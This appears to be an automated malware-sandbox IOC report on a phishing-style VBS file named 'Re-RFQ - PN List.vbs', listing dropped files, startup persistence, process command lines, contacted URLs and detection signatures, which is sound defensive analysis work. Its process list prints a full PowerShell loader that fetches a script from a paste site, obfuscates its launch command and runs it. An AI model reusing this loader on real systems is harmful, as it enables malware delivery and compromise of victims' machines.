IOC Report
Re-RFQ - PN List.vbs

Files

File Path

Type

Category

Malicious

Re-RFQ - PN List.vbs

UTF-8 Unicode text, with very long lines, with CRLF line terminators

initial sample

C:\Users\Public\gia9ab2dg0.PS1

UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.dll

PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows

dropped

C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.0.cs

C++ source, UTF-8 Unicode (with BOM) text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.dll

PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows

dropped

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs

ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Microsoft Cabinet archive data, 61480 bytes, 1 file

dropped

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

data

modified

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

data

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

data

dropped

C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.0.cs

C++ source, UTF-8 Unicode (with BOM) text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.cmdline

UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

dropped

C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.out

UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators

modified

C:\Users\user\AppData\Local\Temp\5arm45ue\CSC76D3F8E3C7D44B4EA91093B17CA01E8C.TMP

MSVC .res

dropped

C:\Users\user\AppData\Local\Temp\RES14F3.tmp

Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ce, 9 symbols

dropped

C:\Users\user\AppData\Local\Temp\RESC9E1.tmp

Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols

dropped

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1g4lgrl3.ws0.psm1

very short file (no magic)

dropped

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5bbucvlc.1j2.ps1

very short file (no magic)

dropped

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c1efweqf.5aa.psm1

very short file (no magic)

dropped

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jrik5clw.pjd.ps1

very short file (no magic)

dropped

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkzpdbdk.wsu.psm1

very short file (no magic)

dropped

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0t1u4d1.0tt.ps1

very short file (no magic)

dropped

C:\Users\user\AppData\Local\Temp\lvvchi0q\CSCF59D68E9AEF44B30A0A5857885C9A6E.TMP

MSVC .res

dropped

C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.cmdline

UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

dropped

C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.out

UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators

modified

C:\Users\user\Documents\20220516\PowerShell_transcript.841618.MEqVT+yD.20220516192930.txt

UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators

dropped

C:\Users\user\Documents\20220516\PowerShell_transcript.841618.RBBMNgBb.20220516193001.txt

UTF-8 Unicode (with BOM) text, with CRLF line terminators

dropped

C:\Users\user\Documents\20220516\PowerShell_transcript.841618.f5mU45le.20220516192941.txt

UTF-8 Unicode (with BOM) text, with CRLF line terminators

dropped

There are 19 hidden files, click here to show them.

Processes

Path

Cmdline

Malicious

C:\Windows\System32\wscript.exe

C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Re-RFQ - PN List.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebRequest] $Request = [System.Net.WebRequest]::Create('https://textbin.net/raw/gia9ab2dg0'); [System.Net.WebResponse] $Response = $Request.GetResponse(); [System.IO.Stream] $Stream = $Response.GetResponseStream(); [System.IO.StreamReader] $Reader = New-Object System.IO.StreamReader $Stream; [String] $FilePath = 'C:\Users\Public\gia9ab2dg0.PS1'; [String] $Command = [System.Text.Encoding]::UTF8.GetString(@(80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32)); [System.IO.File]::WriteAllText($FilePath, $Reader.ReadToEnd(), [System.Text.Encoding]::UTF8); Invoke-Expression ($Command + $FilePath)

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1

C:\Windows\System32\wscript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.cmdline

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC9E1.tmp" "c:\Users\user\AppData\Local\Temp\5arm45ue\CSC76D3F8E3C7D44B4EA91093B17CA01E8C.TMP"

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.cmdline

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES14F3.tmp" "c:\Users\user\AppData\Local\Temp\lvvchi0q\CSCF59D68E9AEF44B30A0A5857885C9A6E.TMP"

There are 3 hidden processes, click here to show them.

URLs

Name

IP

Malicious

https://textbin.net/raw/gia9ab2dg0

148.72.177.212

Details

Name:	https://textbin.net/raw/gia9ab2dg0
IP:	148.72.177.212
TargetID:	2
From Memory:	false
Current Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source:	network

Signature Hits	Behavior Group	Mitre Attack
Wscript starts Powershell (via cmd or directly)	System Summary	PowerShell Scripting
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
IP address seen in connection with other malware	Networking
Uses insecure TLS / SSL version for HTTPS connection	Compliance, Networking
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

https://textbin.net

unknown

Details

Name:	https://textbin.net
TargetID:	2
From Memory:	true
Current Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source:	powershell.exe, 00000002.00000002.523386624.000001B3B4C52000.00000004.00000800.00020000.00000000.sdmp

Signature Hits	Behavior Group	Mitre Attack
Wscript starts Powershell (via cmd or directly)	System Summary	PowerShell Scripting
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

http://nuget.org/NuGet.exe

unknown

Details

Name:	http://nuget.org/NuGet.exe
TargetID:	2
From Memory:	true
Current Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source:	powershell.exe, 00000002.00000002.535236565.000001B3C4AA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
URLs found in memory or binary data	Networking

http://pesterbdd.com/images/Pester.png

unknown

http://www.apache.org/licenses/LICENSE-2.0.html

unknown

Details

Name:	http://www.apache.org/licenses/LICENSE-2.0.html
TargetID:	6
From Memory:	true
Current Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source:	powershell.exe, 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
URLs found in memory or binary data	Networking

https://go.micro

unknown

https://contoso.com/

unknown

https://nuget.org/nuget.exe

unknown

Details

Name:	https://nuget.org/nuget.exe
TargetID:	2
From Memory:	true
Current Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source:	powershell.exe, 00000002.00000002.535236565.000001B3C4AA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
URLs found in memory or binary data	Networking

https://contoso.com/License

unknown